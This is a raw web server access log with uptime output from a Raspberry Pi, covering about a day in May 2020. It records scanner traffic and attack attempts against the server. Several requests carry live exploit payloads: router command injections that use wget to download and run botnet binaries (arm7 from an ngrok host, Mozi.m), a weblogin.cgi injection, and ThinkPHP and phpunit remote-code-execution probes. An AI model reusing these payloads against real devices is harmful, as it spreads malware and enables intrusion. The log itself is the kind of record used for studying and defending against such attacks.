Sun May 24 06:25:18 MDT 2020 06:25:18 up 89 days, 10:53, 1 user, load average: 0.86, 0.41, 0.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 89days 1:39m 3.91s /usr/bin/lxsession -s LXDE-pi -e LXDE 181.211.34.90 - - [24/May/2020:12:52:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 45.79.109.33 - - [24/May/2020:13:09:22 +0000] "GET /admin/connection/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 45.79.109.33 - - [24/May/2020:13:09:22 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.116.40.153 - - [24/May/2020:14:42:30 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 154.116.40.153 - - [24/May/2020:14:42:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 45.166.33.140 - - [24/May/2020:15:52:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 27.54.165.251 - - [24/May/2020:16:05:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 185.128.41.50 - - [24/May/2020:16:27:31 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Java/1.8.0_131" 134.19.215.196 - - [24/May/2020:16:31:19 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 134.19.215.196 - - [24/May/2020:16:31:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.240.205.34 - - [24/May/2020:16:33:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 64.215.81.2 - - [24/May/2020:16:40:50 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.154.94.244 - - [24/May/2020:17:18:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 195.154.94.244 - - [24/May/2020:17:48:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 195.154.94.244 - - [24/May/2020:18:19:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 162.243.139.93 - - [24/May/2020:20:34:25 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 185.216.140.6 - - [24/May/2020:20:49:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 185.216.140.6 - - [24/May/2020:21:04:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 175.7.111.20 - - [24/May/2020:21:10:52 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 5.22.154.158 - - [24/May/2020:22:15:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 195.154.94.244 - - [25/May/2020:00:03:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 37.49.226.252 - - [25/May/2020:00:04:07 +0000] "GET / HTTP/1.1" 200 25000 "" "" 103.73.183.71 - - [25/May/2020:01:07:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.82.127.47 - - [25/May/2020:01:29:48 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 139.162.119.197 - - [25/May/2020:01:42:20 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 195.154.94.244 - - [25/May/2020:03:41:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 195.154.94.244 - - [25/May/2020:03:43:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 195.54.160.130 - - [25/May/2020:04:31:25 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [25/May/2020:04:36:43 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [25/May/2020:04:36:44 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.130 - - [25/May/2020:04:45:06 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.154.94.244 - - [25/May/2020:04:48:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 37.183.193.34 - - [25/May/2020:05:24:16 +0000] "GET / HTTP/1.1" 400 0 "" "" 37.183.193.34 - - [25/May/2020:05:27:24 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 37.183.193.34 - - [25/May/2020:05:27:59 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 37.183.193.34 - - [25/May/2020:05:28:14 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 37.183.193.34 - - [25/May/2020:05:28:39 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 37.183.193.34 - - [25/May/2020:05:30:45 +0000] "GET / HTTP/1.1" 400 0 "" "" 37.183.193.34 - - [25/May/2020:05:31:34 +0000] "GET / HTTP/1.1" 400 0 "" "" 37.183.193.34 - - [25/May/2020:05:32:27 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.243.142.41 - - [25/May/2020:05:42:45 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 195.54.160.130 - - [25/May/2020:06:39:24 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 91.228.59.232 - - [25/May/2020:06:39:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.215.96.46 - - [25/May/2020:07:14:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 70.82.56.94 - - [25/May/2020:07:19:44 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 70.82.56.94 - - [25/May/2020:07:19:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 95.5.34.247 - - [25/May/2020:08:19:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 89.18.47.113 - - [25/May/2020:08:25:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 176.43.128.2 - - [25/May/2020:08:57:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 45.195.146.140 - - [25/May/2020:10:24:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" 197.232.1.182 - - [25/May/2020:10:32:42 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 61.219.11.153 - - [25/May/2020:11:10:25 +0000] "GET / HTTP/1.1" 400 0 "" "" 195.54.160.130 - - [25/May/2020:11:18:02 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 181.112.139.62 - - [25/May/2020:11:43:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 109.234.27.230 - - [25/May/2020:11:54:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 195.54.160.130 - - [25/May/2020:12:07:48 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" Mon May 25 06:25:08 MDT 2020 06:25:09 up 90 days, 10:53, 1 user, load average: 0.43, 0.28, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 90days 1:39m 3.91s /usr/bin/lxsession -s LXDE-pi -e LXDE